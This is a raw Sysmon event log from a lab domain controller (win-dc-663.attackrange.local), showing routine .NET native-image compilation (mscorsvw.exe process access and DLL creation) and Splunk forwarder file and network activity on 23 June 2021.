21:05:07.145{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A203-60D3-4904-00000000CF01}6960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021357Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.114{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A203-60D3-4904-00000000CF01}6960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021356Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:07.114{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A203-60D3-4904-00000000CF01}6960C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021355Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:07.005{4DB9351A-A202-60D3-4804-00000000CF01}4936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1348-0\PresentationFramework.Luna.dll2021-06-23 21:05:07.005 23542300x800000000000000021379Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:08.942{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53A1AB4DDDD6A20DC375D174865CB8B1,SHA256=82A8D425CA7CE7A9EDA34A4BEE0F0CF9EF316BD1B630ECECD1C608933873B52C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021378Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:08.801{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A204-60D3-4E04-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021377Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:08.770{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A204-60D3-4E04-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021376Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:08.770{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A204-60D3-4E04-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021375Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:08.708{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A204-60D3-4D04-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021374Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:08.692{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A204-60D3-4D04-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021373Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:08.692{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A204-60D3-4D04-00000000CF01}7060C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021372Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:08.676{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F765E23A5F30B500F8943DAB11687D9A,SHA256=FC4AFED1A89BD6037F3B65A263DE842E301BBE2C6FB492839FC8E271A67909E7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021371Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:08.551{4DB9351A-A203-60D3-4C04-00000000CF01}6468C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1944-0\PresentationUI.dll2021-06-23 21:05:08.551 23542300x800000000000000021381Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:09.958{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F4C538636DEB9C44DA7967F84F1E5E6,SHA256=38A81DEEED83CF8F4A1979659B23570DE553BD6205C07E16F7102C82CBCA1A62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021380Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:09.708{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=83029E4547FC17C3765E29E4FC5116EA,SHA256=174B5C8F926F26ADA495135E69C2F872F170747FDB10C3C86516AAFCCDB88AB7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021387Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:10.984{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A206-60D3-4F04-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021386Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:10.968{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE1710ED13A4BAFA0824CADF5CD1AEDC,SHA256=CAE1DE25FEEDDA4B13F8E2AD9F26587303FD74C063488F2E042282DE58360218,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021385Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:10.953{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A206-60D3-4F04-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021384Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:10.953{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A206-60D3-4F04-00000000CF01}7044C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021383Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:10.828{4DB9351A-A204-60D3-4E04-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\cb8-0\ReachFramework.dll2021-06-23 21:05:10.828 354300x800000000000000021382Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:08.091{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61435-false10.0.1.12-8000- 23542300x800000000000000021405Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.955{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=08AFAFB07B1C982F3C49329E6FAE1CA3,SHA256=85EF5B7190CE9A78A59AD487C1F57C033D8C2F559256564886AAA5E721CF69E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021404Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A207-60D3-5404-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021403Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.640{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A207-60D3-5404-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021402Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.640{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A207-60D3-5404-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021401Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.578{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A207-60D3-5304-00000000CF01}7152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021400Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.562{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A207-60D3-5304-00000000CF01}7152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021399Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.562{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A207-60D3-5304-00000000CF01}7152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021398Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:11.499{4DB9351A-A207-60D3-5204-00000000CF01}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11f0-0\SMDiagnostics.dll2021-06-23 21:05:11.499 10341000x800000000000000021397Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:11.390{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A207-60D3-5204-00000000CF01}4592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021396Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 